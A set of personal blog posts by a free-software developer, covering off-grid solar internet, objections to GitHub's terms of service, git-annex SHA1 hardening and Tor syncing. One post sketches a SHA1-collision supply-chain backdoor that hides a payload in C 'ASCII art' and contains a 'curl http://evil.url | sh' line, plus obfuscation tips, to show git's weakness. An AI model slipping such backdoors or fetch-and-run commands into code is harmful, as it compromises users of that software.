end of an era

I'm at home downloading hundreds of megabytes of stuff. This is the first time I've been in position of "at home" + "reasonably fast internet" since I moved here in 2012. It's weird!

Satellite internet dish with solar panels in foreground

While I was renting here, I didn't mind dialup much. In a way it helps to focus the mind and build interesting stuff. But since I bought the house, the prospect of only dialup at home ongoing became more painful.

While I hope to get on the fiber line that's only a few miles away eventually, I have not convinced that ISP to build out to me yet. Not enough neighbors. So, satellite internet for now.

9.1 dB SNR

speedtest results: 15 megabit down / 4.5 up with significant variation

Dish seems well aligned, speed varies a lot, but is easily hundreds of times faster than dialup. Latency is 2x dialup.

The equipment uses more power than my laptop, so with the current solar panels, I anticipate using it only 6-9 months of the year. So I may be back to dialup most days come winter, until I get around to adding more PV capacity.

It seems very cool that my house can capture sunlight and use it to beam signals 20 thousand miles into space. Who knows, perhaps there will even be running water one day.

Satellite dish

what I would ask my lawyers about the new Github TOS

The Internet saw Github's new TOS yesterday and collectively shrugged.

That's weird..

I don't have any lawyers, but the way Github's new TOS is written, I feel I'd need to consult with lawyers to understand how it might affect the license of my software if I hosted it on Github.

And the license of my software is important to me, because it is the legal framework within which my software lives or dies. If I didn't care about my software, I'd be able to shrug this off, but since I do it seems very important indeed, and not worth taking risks with.

If I were looking over the TOS with my lawyers, I'd ask these questions...

4 License Grant to Us

This seems to be saying that I'm granting an additional license to my software to Github. Is that right or does "license grant" have some other legal meaning?

If the Free Software license I've already licensed my software under allows for everything in this "License Grant to Us", would that be sufficient, or would my software still be licenced under two different licences?

There are violations of the GPL that can revoke someone's access to software under that license. Suppose that Github took such an action with my software, and their GPL license was revoked. Would they still have a license to my software under this "License Grant to Us" or not?

"Us" is actually defined earlier as "GitHub, Inc., as well as our affiliates, directors, subsidiaries, contractors, licensors, officers, agents, and employees". Does this mean that if someone say, does some brief contracting with Github, that they get my software under this license? Would they still have access to it under that license when the contract work was over? What does "affiliates" mean? Might it include other companies?

Is it even legal for a TOS to require a license grant? Don't license grants normally involve an intentional action on the licensor's part, like signing a contract or writing a license down? All I did was loaded a webpage in a browser and saw on the page that by loading it, they say I've accepted the TOS. (I then set about removing everything from Github.)

Github's old TOS was not structured as a license grant. What reasons might they have for structuring this TOS in such a way?

Am I asking too many questions only 4 words into this thing? Or not enough?

Your Content belongs to you, and you are responsible for Content you post even if it does not belong to you. However, we need the legal right to do things like host it, publish it, and share it. You grant us and our legal successors the right to store and display your Content and make incidental copies as necessary to render the Website and provide the Service.

If this is a software license, the wording seems rather vague compared with other software licenses I've read. How much wiggle room is built into that wording?

What are the chances that, if we had a dispute and this came before a judge, that Github's laywers would be able to find a creative reading of this that makes "do things like" include whatever they want?

Suppose that my software is javascript code or gets compiled to javascript code. Would this let Github serve up the javascript code for their users to run as part of the process of rendering their website?

That means you're giving us the right to do things like reproduce your content (so we can do things like copy it to our database and make backups); display it (so we can do things like show it to you and other users); modify it (so our server can do things like parse it into a search index); distribute it (so we can do things like share it with other users); and perform it (in case your content is something like music or video).

Suppose that Github modified my software, does not distribute the modified version, but converts it to javascipt code and distributes that to their users to run as part of the process of rendering their website. If my software is AGPL licensed, they would be in violation of that license, but doesn't this additional license allow them to modify and distribute my software in such a way?

This license does not grant GitHub the right to sell your Content or otherwise distribute it outside of our Service.

I see that "Service" is defined as "the applications, software, products, and services provided by GitHub". Does that mean at the time I accept the TOS, or at any point in the future?

If Github tomorrow starts providing say, an App Store service, that necessarily involves distribution of software to others, and they put my software in it, would that be allowed by this or not?

If that hypothetical Github App Store doesn't sell apps, but licenses access to them for money, would that be allowed under this license that they want to my software?

5 License Grant to Other Users

Any Content you post publicly, including issues, comments, and contributions to other Users' repositories, may be viewed by others. By setting your repositories to be viewed publicly, you agree to allow others to view and "fork" your repositories (this means that others may make their own copies of your Content in repositories they control).

Let's say that company Foo does something with my software that violates its GPL license and the license is revoked. So they no longer are allowed to copy my software under the GPL, but it's there on Github. Does this "License Grant to Other Users" give them a different license under which they can still copy my software?

The word "fork" has a particular meaning on Github, which often includes modification of the software in a repository. Does this mean that other users could modify my software, even if its regular license didn't allow them to modify it or had been revoked?

How would this use of a platform-specific term "fork" be interpreted in this license if it was being analized in a courtroom?

If you set your pages and repositories to be viewed publicly, you grant each User of GitHub a nonexclusive, worldwide license to access your Content through the GitHub Service, and to use, display and perform your Content, and to reproduce your Content solely on GitHub as permitted through GitHub's functionality. You may grant further rights if you adopt a license.

This paragraph seems entirely innocious. So, what does your keen lawyer mind see in it that I don't?

How sure are you about your answers to all this? We're fairly sure we know how well the GPL holds up in court; how well would your interpretation of all this hold up?

What questions have I forgotten to ask?

And finally, the last question I'd be asking my lawyers:

What's your bill come to? That much? Is using Github worth that much to me?

removing everything from github

Github recently drafted an update to their Terms Of Service. The new TOS is potentially very bad for copylefted Free Software. It potentially neuters it entirely, so GPL licensed software hosted on Github has an implicit BSD-like license. I'll leave the full analysis to the lawyers, but see Thorsten's analysis.

I contacted Github about this weeks ago, and received only an anodyne response. The Free Software Foundation was also talking with them about it. It seems that Github doesn't care or has some reason to want to effectively neuter copyleft software licenses.

The possibility that a Github TOS change could force a change to the license of your software hosted there, and that it's complicated enough that I'd have to hire a lawyer to know for sure, makes Github not worth bothering to use.

Github's value proposition was never very high for me, and went negative now.

I am deleting my repositories from Github at this time. If you used the Github mirrors for git-annex, propellor, ikiwiki, etckeeper, myrepos, click on the links for the non-Github repos (git.joeyh.name also has mirrors). Also, github-backup has a new website and repository off of github. (There's an oncoming severe weather event here, so it may take some time before I get everything deleted and cleaned up.)

[Some commits to git-annex were pushed to Github this morning by an automated system, but I had NOT accepted their new TOS at that point, and explicitly do NOT give Github or anyone any rights to git-annex not granted by its GPL and AGPL licenses.]

See also: PDF of Github TOS that can be read without being forced to first accept Github's TOS

making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it?

Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified).

When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks.

This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see https://git-annex.branchable.com/tips/using_signed_git_commits/.

My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits.

PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. How-ever secure that might be..

SHA1 collision via ASCII art

Happy SHA1 collision day everybody!

If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.

The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)

Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks.

The "good" data chunk might then look like this:


And the "bad" data chunk like this:


Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is.

Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

3*/LN  \.A
5*\LN   \.
5*\7N   /.
3*/7N  /.V

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.

/* Call this at the top of main() */
check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url | sh");

Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.)

After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.

Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them).

Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper.

You can pick either of these two lessons to take away:

  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo

  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up.

Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before.

Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed the the cliff earier; seemed to be worst when house voltage was low.)

Soon, 6 months of more power than I can use..

Previously: battery bank refresh late summer the cliff

Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!)

After attending for four years, I finally thought it was time to perhaps speak at it.

Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the  Free Software Awards and discuss pressing threats and important opportunities for software freedom.

Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998."

That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone.

Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.

-- Here's a sneak peek at LibrePlanet 2017: Register today!

I'll be giving some varient of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.



3 panel comic: 1. In a dark corner of the Linux Conf AU penguin dinner. 2. (Kindly accountant / uncle looking guy) Wanna USB key? First one is free! (I made it myself.) (No driver needed..) 3. It did look homemade, but I couldn't resist... My computer has not been the same since

This actually happened.

Jan 19 00:05:10 darkstar kernel: usb 2-2: Product: ChaosKey-hw-1.0-sw-1.6.

In real life, my hat is uglier, and Keithp is more kindly looking.

gimp source

the cliff

Falling off the cliff is always a surprise. I know it's there; I've been living next to it for months. I chart its outline daily. Avoiding it has become routine, and so comfortable, and so failing to avoid it surprises.

Monday evening around 10 pm, the laptop starts draining down from 100%. House battery, which has been steady around 11.5-10.8 volts since well before Winter solstice, and was in the low 10's, has plummeted to 8.5 volts.

With the old batteries, the cliff used to be at 7 volts, but now, with new batteries but fewer, it's in a surprising place, something like 10 volts, and I fell off it.

Weather forecast for the week ahead is much like the previous week: Maybe a couple sunny afternoons, but mostly no sun at all.

Falling off the cliff is not all bad. It shakes things up. It's a good opportunity to disconnect, to read paper books, and think long winter thoughts. It forces some flexability.

I have an auxillary battery for these situations. With its own little portable solar panel, it can charge the laptop and run it for around 6 hours. But it takes it several days of winter sun to charge back up.

That's enough to get me through the night. Then I take a short trip, and glory in one sunny afternoon. But I know that won't get me out of the hole, the batteries need a sunny week to recover. This evening, I expect to lose power again, and probably tomorrow evening too.

Luckily, my goal for the week was to write slides for two talks, and I've been able to do that despite being mostly offline, and sometimes decomputered.

And, in a few days I will be jetting off to Australia! That should give the batteries a perfect chance to recover.

Previously: battery bank refresh late summer

p2p dreams

In one of the good parts of the very mixed bag that is "Lo and Behold: Reveries of the Connected World", Werner Herzog asks his interviewees what the Internet might dream of, if it could dream.

The best answer he gets is along the lines of: The Internet of before dreamed a dream of the World Wide Web. It dreamed some nodes were servers, and some were clients. And that dream became current reality, because that's the essence of the Internet.

Three years ago, it seemed like perhaps another dream was developing post-Snowden, of dissolving the distinction between clients and servers, connecting peer-to-peer using addresses that are also cryptographic public keys, so authentication and encryption and authorization are built in.

Telehash is one hopeful attempt at this, others include snow, cjdns, i2p, etc. So far, none of them seem to have developed into a widely used network, although any of them still might get there. There are a lot of technical challenges due to the current Internet dream/nightmare, where the peers on the edges have multiple barriers to connecting to other peers.

But, one project has developed something similar to the new dream, almost as a side effect of its main goals: Tor's onion services.

I'd wanted to use such a thing in git-annex, for peer-to-peer sharing and syncing of git-annex repositories. On November 13th, I started building it, using Tor, and I'm releasing it concurrently with this blog post.

git-annex's Tor support replaces its old hack of tunneling git protocol over XMPP. That hack was unreliable (it needed a TCP on top of XMPP layer) but worse, the XMPP server could see all the data being transferred. And, there are fewer large XMPP servers these days, so fewer users could use it at all. If you were using XMPP with git-annex, you'll need to switch to either Tor or a server accessed via ssh.

Now git-annex can serve a repository as a Tor onion service, and that can then be accessed as a git remote, using an url like tor-annex::tungqmfb62z3qirc.onion:42913. All the regular git, and git-annex commands, can be used with such a remote.

Tor has a lot of goals for protecting anonymity and privacy. But the important things for this project are just that it has end-to-end encryption, with addresses that are public keys, and allows P2P connections. Building an anonymous file exchange on top of Tor is not my goal -- if you want that, you probably don't want to be exchanging git histories that record every edit to the file and expose your real name by default.

Building this was not without its difficulties. Tor onion services were originally intended to run hidden websites, not to connect peers to peers, and this kind of shows..

Tor does not cater to end users setting up lots of Onion services. Either root has to edit the torrc file, or the Tor control port can be used to ask it to set one up. But, the control port is not enabled by default, so you still need to su to root to enable it. Also, it's difficult to find a place to put the hidden service's unix socket file that's writable by a non-root user. So I had to code around this, with a git annex enable-tor that su's to root and sets it all up for you.

One interesting detail about the implementation of the P2P protocol in git-annex is that it uses two Free monads to build up actions. There's a Net monad which can be used to send and receive protocol messages, and a Local monad which allows only the necessary modifications to files on disk. Interpreters for Free monad actions can chose exactly which actions to allow for security reasons.

For example, before a peer has authenticated, the P2P protocol is being run by an interpreter that refuses to run any Local actions whatsoever. Other interpreters for the Net monad could be used to support other network transports than Tor.

When two peers are connected over Tor, one knows it's talking to the owner of a particular onion address, but the other peer knows nothing about who's talking to it, by design. This makes authentication harder than it would be in a P2P system with a design like Telehash. So git-annex does its own authentication on top of Tor.

With authentication, users would need to exchange absurdly long addresses (over 150 characters) to connect their repositories. One very convenient thing about using XMPP was that a user would have connections to their friend's accounts, so it was easy to share with them. Exchanging long addresses is too hard.

This is where Magic Wormhole saved the day. It's a very elegant way to get any two peers in touch with each other, and the users only have to exchange a short code phrase, like "2-mango-delight", which can only be used once. Magic Wormhole makes some security tradeoffs for this simplicity. It's got vulnerabilities to DOS attacks, and its MITM resistance could be improved. But I'm lucky it came along just in time.

So, it takes only installing Tor and Magic Wormhole, running two git-annex commands, and exchanging short code phrases with a friend, perhaps over the phone or in an encrypted email, to get your git-annex repositories connected and syncing over Tor. See the documentation for details. Also, the git-annex webapp allows setting the same thing up point-and-click style.

The Tor project blog has throughout December been featuring all kinds of projects that are using Tor. Consider this a late bonus addition to that. ;)

I hope that Tor onion services will continue to develop to make them easier to use for peer-to-peer systems. We can still dream a better Internet.

This work was made possible by all my supporters on Patreon.